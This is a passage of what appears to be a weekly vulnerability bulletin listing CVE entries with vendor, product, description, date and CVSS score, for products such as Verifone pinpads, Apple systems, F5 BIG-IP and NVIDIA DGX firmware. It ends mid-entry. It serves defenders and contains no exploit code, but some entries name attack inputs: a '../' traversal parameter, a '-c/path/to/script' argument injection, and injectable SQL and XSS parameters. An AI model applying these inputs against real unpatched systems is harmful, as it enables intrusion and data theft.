verifone — mx900_firmware Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow multiple arbitrary command injections, as demonstrated by the file manager. 2020-10-23 4.6 CVE-2019-14719
MISC
verifone — mx900_firmware Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have Insecure Permissions, with resultant svc_netcontrol arbitrary command injection and privilege escalation. 2020-10-23 4.6 CVE-2019-14718
MISC
verifone — p400_firmware Verifone Pinpad Payment Terminals allow undocumented physical access to the system via an SBI bootloader memory write operation. 2020-10-23 4.6 CVE-2019-14715
MISC
verifone — verix_os Verifone VerixV Pinpad Payment Terminals with QT000530 have an undocumented physical access mode (aka VerixV shell.out). 2020-10-23 4.6 CVE-2019-14716
MISC
verifone — verix_os Verifone VerixV Pinpad Payment Terminals with QT000530 allow bypass of integrity and origin control for S1G file generation. 2020-10-23 4.6 CVE-2019-14712
MISC
verifone — verix_os Verifone Verix OS on VerixV Pinpad Payment Terminals with QT000530 have a Buffer Overflow via the Run system call. 2020-10-23 4.6 CVE-2019-14717
MISC
victor_cms_project — victor_cms A SQL injection vulnerability exists in Victor CMS V1.0 in the cat_id parameter of the category.php file. This parameter can be used by sqlmap to obtain data information in the database. 2020-10-27 5 CVE-2020-23945
MISC
vmware — horizon_client VMware Horizon Client for Windows (5.x prior to 5.5.0) contains an information disclosure vulnerability. A malicious attacker with local privileges on the machine where Horizon Client for Windows is installed may be able to retrieve hashed credentials if the client crashes. 2020-10-23 4 CVE-2020-3998
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apple — ipados A trust issue was addressed by removing a legacy API. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0. An attacker may be able to misuse a trust relationship to download malicious content. 2020-10-27 2.1 CVE-2020-9979
MISC
MISC
apple — ipados This issue was resolved by replacing device names with a random identifier. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15, watchOS 6, tvOS 13. An attacker in physical proximity may be able to passively observe device names in AWDL communications. 2020-10-27 2.1 CVE-2019-8799
MISC
MISC
MISC
MISC
apple — ipados A validation issue was addressed with improved logic. This issue is fixed in macOS Catalina 10.15, iOS 13.1 and iPadOS 13.1, tvOS 13, watchOS 6, iOS 13. A local app may be able to read a persistent account identifier. 2020-10-27 2.1 CVE-2019-8809
MISC
MISC
MISC
MISC
MISC
apple — iphone_os A lock screen issue allowed access to the share function on a locked device. This issue was addressed by restricting options offered on a locked device. This issue is fixed in iOS 12.1.1. A local attacker may be able to share items from the lock screen. 2020-10-27 3.6 CVE-2018-4428
MISC
apple — iphone_os This issue was addressed with a new entitlement. This issue is fixed in iOS 12.1. A local user may be able to read a persistent device identifier. 2020-10-27 2.1 CVE-2018-4339
MISC
apple — iphone_os The issue was addressed with improved data deletion. This issue is fixed in iOS 13. Deleted calls remained visible on the device. 2020-10-27 2.1 CVE-2019-8732
MISC
apple — iphone_os A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15, iOS 13. A local user may be able to check for the existence of arbitrary files. 2020-10-27 2.1 CVE-2019-8708
MISC
MISC
MISC
apple — iphone_os A memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.1.1, watchOS 5.1.2, macOS Mojave 10.14.2, Security Update 2018-003 High Sierra, Security Update 2018-006 Sierra, tvOS 12.1.1. A local user may be able to read kernel memory. 2020-10-27 2.1 CVE-2018-4448
MISC
MISC
MISC
MISC
MISC
apple — iphone_os A configuration issue was addressed with additional restrictions. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, watchOS 5, iOS 12, tvOS 12, macOS Mojave 10.14. A malicious application may be able to modify protected parts of the file system. 2020-10-27 2.1 CVE-2018-4433
MISC
MISC
MISC
MISC
MISC
apple — mac_os_x A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. A local attacker may be able to view contacts from the lock screen. 2020-10-27 2.1 CVE-2019-8777
MISC
apple — mac_os_x A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. In certain configurations, a remote attacker may be able to submit arbitrary print jobs. 2020-10-27 2.6 CVE-2019-8842
MISC
checkpoint — zonealarm Check Point ZoneAlarm before version 15.8.139.18543 allows a local actor to delete arbitrary files while restoring files in Anti-Ransomware. 2020-10-27 3.6 CVE-2020-6022
MISC
comtrend — ar-5387un_firmware A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service. 2020-10-23 3.5 CVE-2018-8062
MISC
getgophish — gophish Cross Site Scripting (XSS) vulnerability in Gophish before 0.11.0 via the Host field on the send profile form. 2020-10-28 3.5 CVE-2020-24708
MISC
MISC
getgophish — gophish Cross Site Scripting (XSS) vulnerability in Gophish before 0.11.0 via the IMAP Host field on the account settings page. 2020-10-28 3.5 CVE-2020-24712
MISC
MISC
MISC
getgophish — gophish Cross Site Scripting (XSS) vulnerability in Gophish through 0.10.1 via a crafted landing page or email template. 2020-10-28 3.5 CVE-2020-24709
MISC
ibm — resilient_security_orchestration_automation_and_response IBM Resilient SOAR V38.0 could allow an attacker on the internal net work to provide the server with a spoofed source IP address. IBM X-Force ID: 190567. 2020-10-29 3.3 CVE-2020-4864
XF
CONFIRM
open-xchange — open-xchange_appsuite OX App Suite through 7.10.3 allows stats/diagnostic?param= XSS. 2020-10-23 3.5 CVE-2020-15004
MISC
MISC
openr — opentmpfiles opentmpfiles through 0.3.1 allows local users to take ownership of arbitrary files because d entries are mishandled and allow a symlink attack. 2020-10-26 2.1 CVE-2017-18925
MISC
pulsesecure — pulse_secure_desktop Pulse Secure Desktop Client 9.0Rx before 9.0R5 and 9.1Rx before 9.1R4 on Windows reveals users’ passwords if Save Settings is enabled. 2020-10-27 1.9 CVE-2020-8956
MISC
pulsesecure — pulse_secure_desktop_client A vulnerability in the authenticated user web interface of Pulse Connect Secure < 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) through the CGI file. 2020-10-28 3.5 CVE-2020-8263
MISC
requarks — wiki.js In Wiki.js before version 2.5.162, an XSS payload can be injected in a page title and executed via the search results. While the title is properly escaped in both the navigation links and the actual page title, it is not the case in the search results. Commit a57d9af34c15adbf460dde6553d964efddf433de fixes this vulnerability (version 2.5.162) by properly escaping the text content displayed in the search results. 2020-10-26 3.5 CVE-2020-15274
MISC
MISC
CONFIRM
verifone — mx900_firmware Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow installation of unsigned packages. 2020-10-23 2.1 CVE-2019-14713
MISC
vmware — horizon VMware Horizon Server (7.x prior to 7.10.3 or 7.13.0) contains a Cross Site Scripting (XSS) vulnerability. Successful exploitation of this issue may allow an attacker to inject malicious script which will be executed. 2020-10-23 3.5 CVE-2020-3997
MISC
yourls — yourls Multiple Stored Cross Site Scripting (XSS) vulnerabilities exist in the YOURLS Admin Panel, Versions 1.5 – 1.7.10. An authenticated user must modify a PHP plugin with a malicious payload and upload it, resulting in multiple stored XSS issues. 2020-10-23 3.5 CVE-2020-27388
MISC
MISC
MISC
zte — evdc A ZTE product is impacted by an XSS vulnerability. The vulnerability is caused by the lack of correct verification of client data in the WEB module. By inserting malicious scripts into the web module, a remote attacker could trigger an XSS attack when the user browses the web page. Then the attacker could use the vulnerability to steal user cookies or destroy the page structure. This affects: eVDC ZXCLOUD-iROSV6.03.04 2020-10-26 3.5 CVE-2020-6876
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apple — ios_and_ipados
 
The issue was addressed with improved validation when an iCloud Link is created. This issue is fixed in iOS 13.3 and iPadOS 13.3. Live Photo audio and video data may be shared via iCloud links even if Live Photo is disabled in the Share Sheet carousel. 2020-10-27 not yet calculated CVE-2019-8857
MISC
apple — macos A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. A Mac may not lock immediately upon wake. 2020-10-27 not yet calculated CVE-2019-8851
MISC
apple — macos A logic issue was addressed with improved validation. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-27 not yet calculated CVE-2019-8640
MISC

apple — macos

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. An application may be able to execute arbitrary code with system privileges. 2020-10-27 not yet calculated CVE-2019-8569
MISC
MISC
apple — macos An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. Processing a maliciously crafted mail message may lead to S/MIME signature spoofing. 2020-10-27 not yet calculated CVE-2019-8642
MISC
apple — macos
 
A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. A remote attacker may be able to overwrite existing files. 2020-10-27 not yet calculated CVE-2020-9782
MISC
apple — macos
 
An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail. 2020-10-27 not yet calculated CVE-2019-8645
MISC
apple — macos
 
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra, macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. An application may be able to gain elevated privileges. 2020-10-27 not yet calculated CVE-2020-3851
MISC
MISC
apple — macos
 
This was addressed with additional checks by Gatekeeper on files mounted through a network share. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper. 2020-10-27 not yet calculated CVE-2019-8656
MISC
apple — macos
 
This issue is fixed in macOS Mojave 10.14. A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks. 2020-10-27 not yet calculated CVE-2018-4296
MISC
apple — macos_catalina
 
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006. A user who shares their screen may not be able to end screen sharing. 2020-10-27 not yet calculated CVE-2019-8858
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved validation. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, tvOS 13. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 not yet calculated CVE-2020-9932
MISC
MISC
MISC
apple — safari
 
A logic issue was addressed with improved validation. This issue is fixed in Safari 13.0.5. A URL scheme may be incorrectly ignored when determining multimedia permission for a website. 2020-10-27 not yet calculated CVE-2020-3852
MISC
apple — swift_for_ubuntu
 
This issue was addresses by updating incorrect URLSession file descriptors management logic to match Swift 5.0. This issue is fixed in Swift 5.1.1 for Ubuntu. Incorrect management of file descriptors in URLSession could lead to inadvertent data disclosure. 2020-10-27 not yet calculated CVE-2019-8790
MISC
apple — xcode
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 11.3. Compiling with untrusted sources may lead to arbitrary code execution with user privileges. 2020-10-27 not yet calculated CVE-2019-8840
MISC
arista — cloudvision_exchange_server
 
Arista’s CloudVision eXchange (CVX) server before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (crash and restart) in the ControllerOob agent via a malformed control-plane packet. 2020-10-26 not yet calculated CVE-2020-13100
CONFIRM
arista — eos
 
Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause traffic loss or incorrect forwarding of traffic via a malformed link-state PDU to the IS-IS router. 2020-10-26 not yet calculated CVE-2020-15897
CONFIRM
basercms — basercms
 
baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. The issue affects the following components: Edit feed settings, Edit widget area, Sub site new registration, New category registration. Arbitrary JavaScript may be executed by entering specific characters in the account that can access the file upload function category list, subsite setting list, widget area edit, and feed list on the management screen. The issue was introduced in version 4.0.0. It is fixed in version 4.4.1. 2020-10-30 not yet calculated CVE-2020-15273
MISC
CONFIRM
MISC
basercms — basercms
 
baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. Arbitrary JavaScript may be executed by entering a crafted nickname in blog comments. The issue affects the blog comment component. It is fixed in version 4.4.1. 2020-10-30 not yet calculated CVE-2020-15276
MISC
MISC
CONFIRM
basercms — basercms
 
baserCMS before version 4.4.1 is affected by Remote Code Execution (RCE). Code may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The Edit template component is vulnerable. The issue is fixed in version 4.4.1. 2020-10-30 not yet calculated CVE-2020-15277
MISC
MISC
CONFIRM
broadleaf_commerce — broadleaf_framework
 
Broadleaf Commerce 5.1.14-GA is affected by cross-site scripting (XSS) due to a slow HTTP post vulnerability. 2020-10-29 not yet calculated CVE-2020-21266
MISC
canonical — ubuntu
 
There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root. 2020-10-31 not yet calculated CVE-2020-15703
CONFIRM
MISC
chart.js — chart.js
 
This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution. 2020-10-29 not yet calculated CVE-2020-7746
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
citadel — webcit
 
Citadel WebCit through 926 allows unauthenticated remote attackers to enumerate valid users within the platform. NOTE: this was reported to the vendor in a publicly archived “Multiple Security Vulnerabilities in WebCit 926” thread. 2020-10-28 not yet calculated CVE-2020-27740
MISC
MISC
citadel — webcit
 
Multiple cross-site scripting (XSS) vulnerabilities in Citadel WebCit through 926 allow remote attackers to inject arbitrary web script or HTML via multiple pages and parameters. NOTE: this was reported to the vendor in a publicly archived “Multiple Security Vulnerabilities in WebCit 926” thread. 2020-10-28 not yet calculated CVE-2020-27741
MISC
MISC
citadel — webcit
 
An Insecure Direct Object Reference vulnerability in Citadel WebCit through 926 allows authenticated remote attackers to read someone else’s emails via the msg_confirm_move template. NOTE: this was reported to the vendor in a publicly archived “Multiple Security Vulnerabilities in WebCit 926” thread. 2020-10-28 not yet calculated CVE-2020-27742
MISC
MISC
citadel — webcit
 
A Weak Session Management vulnerability in Citadel WebCit through 926 allows unauthenticated remote attackers to hijack recently logged-in users’ sessions. NOTE: this was reported to the vendor in a publicly archived “Multiple Security Vulnerabilities in WebCit 926” thread. 2020-10-28 not yet calculated CVE-2020-27739
MISC
MISC
click_studios — passwordstate
 
An issue was discovered in Click Studios Passwordstate 8.9 (Build 8973).If the user of the system has assigned himself a PIN code for entering from a mobile device using the built-in generator (4 digits), a remote attacker has the opportunity to conduct a brute force attack on this PIN code. As result, remote attacker retrieves all passwords from another systems, available for affected account. 2020-10-29 not yet calculated CVE-2020-27747
MISC
MISC
codemirror — codemirror
 
This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2. The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)* 2020-10-30 not yet calculated CVE-2020-7760
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
commscope — ruckus
 
Ruckus through 1.5.1.0.21 is affected by remote command injection. An authenticated user can submit a query to the API (/service/v1/createUser endpoint), injecting arbitrary commands that will be executed as root user via web.py. 2020-10-26 not yet calculated CVE-2020-26878
MISC
MISC
MISC
CONFIRM
MISC
MISC
commscope — rukus_vriot
 
Ruckus vRioT through 1.5.1.0.21 has an API backdoor that is hardcoded into validate_token.py. An unauthenticated attacker can interact with the service API by using a backdoor value as the Authorization header. 2020-10-26 not yet calculated CVE-2020-26879
MISC
MISC
MISC
CONFIRM
MISC
MISC
commvault — commcell
 
In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead view a file outside of the log-files folder. 2020-10-29 not yet calculated CVE-2020-25780
MISC
cyberark — privileged_session_manager
 
CyberArk Privileged Session Manager (PSM) 10.9.0.15 allows attackers to discover internal pathnames by reading an error popup message after two hours of idle time. 2020-10-28 not yet calculated CVE-2020-25374
MISC
MISC
dat.gui — dat.gui
 
All versions of package dat.gui are vulnerable to Regular Expression Denial of Service (ReDoS) via specifically crafted rgb and rgba values. 2020-10-27 not yet calculated CVE-2020-7755
MISC
MISC
debian — blueman
 
Blueman is a GTK+ Bluetooth Manager. In Blueman before 2.1.4, the DhcpClient method of the D-Bus interface to blueman-mechanism is prone to an argument injection vulnerability. The impact highly depends on the system configuration. If Polkit-1 is disabled and for versions lower than 2.0.6, any local user can possibly exploit this. If Polkit-1 is enabled for version 2.0.6 and later, a possible attacker needs to be allowed to use the `org.blueman.dhcp.client` action. That is limited to users in the wheel group in the shipped rules file that do have the privileges anyway. On systems with ISC DHCP client (dhclient), attackers can pass arguments to `ip link` with the interface name that can e.g. be used to bring down an interface or add an arbitrary XDP/BPF program. On systems with dhcpcd and without ISC DHCP client, attackers can even run arbitrary scripts by passing `-c/path/to/script` as an interface name. Patches are included in 2.1.4 and master that change the DhcpClient D-Bus method(s) to accept BlueZ network object paths instead of network interface names. A backport to 2.0(.8) is also available. As a workaround, make sure that Polkit-1-support is enabled and limit privileges for the `org.blueman.dhcp.client` action to users that are able to run arbitrary commands as root anyway in /usr/share/polkit-1/rules.d/blueman.rules. 2020-10-27 not yet calculated CVE-2020-15238
MISC
MISC
MISC
CONFIRM
DEBIAN
eyesofnetwork — eonweb
 
An issue was discovered in EyesOfNetwork eonweb 5.3-7 through 5.3-8. The eonweb web interface is prone to a SQL injection, allowing an unauthenticated attacker to exploit the username_available function of the includes/functions.php file (which is called by login.php). 2020-10-29 not yet calculated CVE-2020-27886
MISC
MISC
MISC
eyesofnetwork — eonweb
 
An issue was discovered in EyesOfNetwork 5.3 through 5.3-8. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the nmap_binary parameter to lilac/autodiscovery.php. 2020-10-29 not yet calculated CVE-2020-27887
MISC
MISC
MISC
f5 — big-ip On BIG-IP LTM 15.1.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.1, the Traffic Management Microkernel (TMM) process may consume excessive resources when processing SSL traffic and client authentication are enabled on the client SSL profile. 2020-10-29 not yet calculated CVE-2020-5936
MISC
f5 — big-ip
 
On BIG-IP 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when negotiating IPSec tunnels with configured, authenticated peers, the peer may negotiate a different key length than the BIG-IP configuration would otherwise allow. 2020-10-29 not yet calculated CVE-2020-5938
MISC
f5 — big-ip
 
On BIG-IP AFM 15.1.0-15.1.0.5, the Traffic Management Microkernel (TMM) may produce a core file while processing layer 4 (L4) behavioral denial-of-service (DoS) traffic. 2020-10-29 not yet calculated CVE-2020-5937
MISC
f5 — big-ip
 
On BIG-IP 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, Virtual servers with a OneConnect profile may incorrectly handle WebSockets related HTTP response headers, causing TMM to restart. 2020-10-29 not yet calculated CVE-2020-5931
MISC
f5 — big-ip
 
On BIG-IP ASM 15.1.0-15.1.0.5, a cross-site scripting (XSS) vulnerability exists in the BIG-IP ASM Configuration utility response and blocking pages. An authenticated user with administrative privileges can specify a response page with any content, including JavaScript code that will be executed when preview is opened. 2020-10-29 not yet calculated CVE-2020-5932
MISC
f5 — big-ip
 
On BIG-IP APM 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, and 13.1.0-13.1.3.3, when multiple HTTP requests from the same client to configured SAML Single Logout (SLO) URL are passing through a TCP Keep-Alive connection, traffic to TMM can be disrupted. 2020-10-29 not yet calculated CVE-2020-5934
MISC
f5 — big-ip
 
On BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) versions 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, and 13.1.0-13.1.3.3, when handling MQTT traffic through a BIG-IP virtual server associated with an MQTT profile and an iRule performing manipulations on that traffic, TMM may produce a core file. 2020-10-29 not yet calculated CVE-2020-5935
MISC
f5 — big-ip
 
On versions 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, when a BIG-IP system that has a virtual server configured with an HTTP compression profile processes compressed HTTP message payloads that require deflation, a Slowloris-style attack can trigger an out-of-memory condition on the BIG-IP system. 2020-10-29 not yet calculated CVE-2020-5933
MISC
facebook — hermes
 
An out-of-bounds read in the JavaScript Interpreter in Facebook Hermes prior to commit 8cb935cd3b2321c46aa6b7ed8454d95c75a7fca0 allows attackers to cause a denial of service attack or possible further memory corruption via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected. 2020-10-26 not yet calculated CVE-2020-1915
CONFIRM
CONFIRM
fastreport — fastreport
 
An issue was discovered in FastReport before 2020.4.0. It lacks a ScriptSecurity feature and therefore may mishandle (for example) GetType, typeof, TypeOf, DllImport, LoadLibrary, and GetProcAddress. 2020-10-29 not yet calculated CVE-2020-27998
MISC
MISC
MISC
firefly_iii — firefly_iii
 
An XSS vulnerability in the auto-complete function of the description field (for new or edited transactions) in Firefly III before 5.4.5 allows the user to execute JavaScript via suggested transaction titles. NOTE: this is exploitable only in a non-default configuration where Content Security Policy headers are disabled. 2020-10-28 not yet calculated CVE-2020-27981
MISC
MISC
genexis — platnium-4410-v2-1.28_devices
 
Genexis Platinum-4410 P4410-V2-1.28 devices allow stored XSS in the WLAN SSID parameter. This could allow an attacker to perform malicious actions in which the XSS popup will affect all privileged users. 2020-10-28 not yet calculated CVE-2020-27980
MISC
MISC
god_kings — god_kings
 
The God Kings application 0.60.1 for Android exposes a broadcast receiver to other apps called com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver. The purpose of this broadcast receiver is to show an in-game push notification to the player. However, the application does not enforce any authorization schema on the broadcast receiver, allowing any application to send fully customizable in-game push notifications. 2020-10-28 not yet calculated CVE-2020-25204
MISC
hewlett_packard — storeserv_management_console
 
SSMC3.7.0.0 is vulnerable to remote authentication bypass. HPE StoreServ Management Console (SSMC) 3.7.0.0 is an off node multiarray manager web application and remains isolated from data on the managed arrays. HPE has provided an update to HPE StoreServ Management Console (SSMC) software 3.7.0.0* Upgrade to HPE 3PAR StoreServ Management Console 3.7.1.1 or later. 2020-10-26 not yet calculated CVE-2020-7197
MISC
hrsale — hrsale
 
Hrsale 2.0.0 allows download?type=files&filename=../ directory traversal to read arbitrary files. 2020-10-29 not yet calculated CVE-2020-27993
MISC
lookatme — lookatme
 
In lookatme (python/pypi package) versions prior to 2.3.0, the package automatically loaded the built-in “terminal” and “file_loader” extensions. Users that use lookatme to render untrusted markdown may have malicious shell commands automatically run on their system. This is fixed in version 2.3.0. As a workaround, the `lookatme/contrib/terminal.py` and `lookatme/contrib/file_loader.py` files may be manually deleted. Additionally, it is always recommended to be aware of what is being rendered with lookatme. 2020-10-26 not yet calculated CVE-2020-15271
MISC
MISC
MISC
CONFIRM
MISC
mediawiki — mediawiki 
 
The RandomGameUnit extension for MediaWiki through 1.35 was not properly escaping various title-related data. When certain varieties of games were created within MediaWiki, their names or titles could be manipulated to generate stored XSS within the RandomGameUnit extension. 2020-10-28 not yet calculated CVE-2020-27957
MISC
MISC
micro_focus — multiple_products
 
Code execution with escalated privileges vulnerability in Micro Focus products Operation Bridge Manager and Operation Bridge (containerized). The vulneravility affects: 1.) Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions. 2.) Operations Bridge (containerized) versions: 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. The vulnerability could allow local attackers to execute code with escalated privileges. 2020-10-27 not yet calculated CVE-2020-11858
MISC
MISC
MISC
micro_focus — multiple_products
 
Arbitrary code execution vlnerability in Operation bridge Manager, Application Performance Management and Operations Bridge (containerized) vulnerability in Micro Focus products products Operation Bridge Manager, Operation Bridge (containerized) and Application Performance Management. The vulneravility affects: 1.) Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions. 2.) Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.) Application Performance Management versions 9,51, 9.50 and 9.40 with uCMDB 10.33 CUP 3. The vulnerability could allow Arbitrary code execution. 2020-10-27 not yet calculated CVE-2020-11854
MISC
MISC
MISC
MISC
mozilla — firefox
 
When performing EC scalar point multiplication, the wNAF point multiplication algorithm was used; which leaked partial information about the nonce used during signature generation. Given an electro-magnetic trace of a few signature generations, the private key could have been computed. This vulnerability affects Firefox < 80 and Firefox for Android < 80. 2020-10-28 not yet calculated CVE-2020-6829
MISC
MISC
MISC
nvida — dgx_servers NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which software allows an attacker to upload or transfer files that can be automatically processed within the product’s environment, which may lead to remote code execution. 2020-10-29 not yet calculated CVE-2020-11486
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which the Pseudo-Random Number Generator (PRNG) algorithm used in the JSOL package that implements the IPMI protocol is not cryptographically strong, which may lead to information disclosure. 2020-10-29 not yet calculated CVE-2020-11616
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, DGX-1 with BMC firmware versions prior to 3.38.30. DGX-2 with BMC firmware versions prior to 1.06.06 and all DGX A100 Servers with all BMC firmware versions, contains a vulnerability in the AMI BMC firmware in which the use of a hard-coded RSA 1024 key with weak ciphers may lead to information disclosure. 2020-10-29 not yet calculated CVE-2020-11487
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contains a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure. 2020-10-29 not yet calculated CVE-2020-11484
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which it uses a hard-coded RC4 cipher key, which may lead to information disclosure. 2020-10-29 not yet calculated CVE-2020-11615
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contain a vulnerability in the AMI BMC firmware in which default SNMP community strings are used, which may lead to information disclosure. 2020-10-29 not yet calculated CVE-2020-11489
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contains a Cross-Site Request Forgery (CSRF) vulnerability in the AMI BMC firmware in which the web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request, which can lead to information disclosure or code execution. 2020-10-29 not yet calculated CVE-2020-11485
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contains a vulnerability in the AMI BMC firmware in which software does not validate the RSA 1024 public key used to verify the firmware signature, which may lead to information disclosure or code execution. 2020-10-29 not yet calculated CVE-2020-11488
CONFIRM
nvida — dgx_servers
 
NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contains a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure. 2020-10-29 not yet calculated CVE-2020-11483
CONFIRM
nvidia — cuda_toolkit
 
NVIDIA CUDA Toolkit, all versions prior to 11.1.1, contains a vulnerability in the NVJPEG library in which an out-of-bounds read or write operation may lead to code execution, denial of service, or information disclosure. 2020-10-30 not yet calculated CVE-2020-5991
CONFIRM
openrc — openrc
 
checkpath in OpenRC through 0.42.1 might allow local users to take ownership of arbitrary files because a non-terminal path component can be a symlink. 2020-10-27 not yet calculated CVE-2018-21269
MISC
pam_tacplus — libtac
 
